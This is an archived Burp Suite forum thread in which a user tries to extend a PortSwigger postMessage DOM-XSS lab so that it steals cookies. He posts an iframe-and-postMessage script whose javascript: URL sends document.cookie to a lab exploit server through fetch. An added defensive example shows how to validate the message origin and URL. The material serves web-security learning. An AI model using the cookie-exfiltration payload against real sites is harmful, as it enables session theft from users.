The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum


Use postmessage to steal cookies

Stefan | Last updated: Dec 03, 2022 10:22PM UTC

Hi, I have been testing this lab: https://portswigger.net/web-security/dom-based/controlling-the-web-message-source/lab-dom-xss-using-web-messages-and-json-parse but how could I use that to get the cookies? Not just an alert. I tried this script but it's not working. The request appears in the log on the exploit server but no cookie. (In that lab the session is httpOnly=true, but if it were false, would this work?) I added my own cookies for testing, but with no luck.

<script>
function send() {
  var frame = document.getElementById("myFrame");
  var script ='javascript:fetch('https://exploit-MYLAB.exploit-server.net/log?c='+document.cookie, {\"mode\":\"no-cors\"})";
  var message =JSON.stringify({"type":"load-channel","url":script});
  frame.contentWindow.postMessage(message,"*");
}
</script>
<iframe src=https://labid.web-security-academy.net/ onload="send()" id="myFrame"></iframe>

Stefan | Last updated: Dec 03, 2022 10:28PM UTC

OK, there are some errors in this script. It should be:

var script ="javascript:fetch('https://exploit-MYLAB.exploit-server.net/log?c='+document.cookie, {\"mode\":\"no-cors\"})";

Stefan | Last updated: Dec 03, 2022 10:57PM UTC

I also tried to read cookies from the iframe:

document.getElementById("myFrame").contentDocument.cookie

Did not work.

Hannah, PortSwigger Agent | Last updated: Dec 06, 2022 10:14AM UTC

Hi, are you trying to solve the lab or to explore your learnings from the Web Academy? The target of this lab is to simply call the "print()" function.

Stefan | Last updated: Dec 06, 2022 05:53PM UTC

I solved the lab but wanted to take it further. Beyond print()... With either fetch or XMLHttpRequest to Collaborator or the exploit server. But I realised that this lab isn't made for that. There are CORS problems and HttpOnly cookies... What I wanted is a lab with a postMessage exploit.
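
Added example, not part of the thread or the lab's own code: how a page that accepts the {"type":"load-channel","url":...} message discussed above can validate the sender and the URL before using it, so a javascript: URL from an arbitrary framing page is ignored. The function name, the origin and host allowlists, and the "channel-frame" element id are assumptions made for illustration.

```javascript
// Constructed allowlists (assumptions): who may send messages, and which
// hosts a channel URL may point to.
const TRUSTED_ORIGINS = new Set(["https://app.example"]);
const ALLOWED_CHANNEL_HOSTS = new Set(["channels.example"]);

// Returns a normalised https URL string if the message is acceptable,
// otherwise null. Pure function so it can be unit-tested outside a browser.
function validateChannelMessage(origin, data) {
  // 1. Only accept messages from known senders (event.origin in a browser).
  if (!TRUSTED_ORIGINS.has(origin)) return null;
  // 2. Parse defensively: the payload is attacker-controlled text.
  if (typeof data !== "string") return null;
  let msg;
  try {
    msg = JSON.parse(data);
  } catch {
    return null;
  }
  if (msg === null || typeof msg !== "object") return null;
  if (msg.type !== "load-channel" || typeof msg.url !== "string") return null;
  // 3. Parse the URL and check scheme and host explicitly. This rejects
  //    javascript:, data: and any host not on the allowlist.
  let url;
  try {
    url = new URL(msg.url);
  } catch {
    return null;
  }
  if (url.protocol !== "https:") return null;
  if (!ALLOWED_CHANNEL_HOSTS.has(url.host)) return null;
  return url.href;
}

// Browser wiring (skipped when run outside a browser).
if (typeof window !== "undefined") {
  window.addEventListener("message", (event) => {
    const safeUrl = validateChannelMessage(event.origin, event.data);
    if (safeUrl === null) return; // drop anything that fails validation
    // "channel-frame" is a hypothetical element id.
    document.getElementById("channel-frame").src = safeUrl;
  });
}
```
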

Hannah, PortSwigger Agent | Last updated: Dec 08, 2022 11:52AM UTC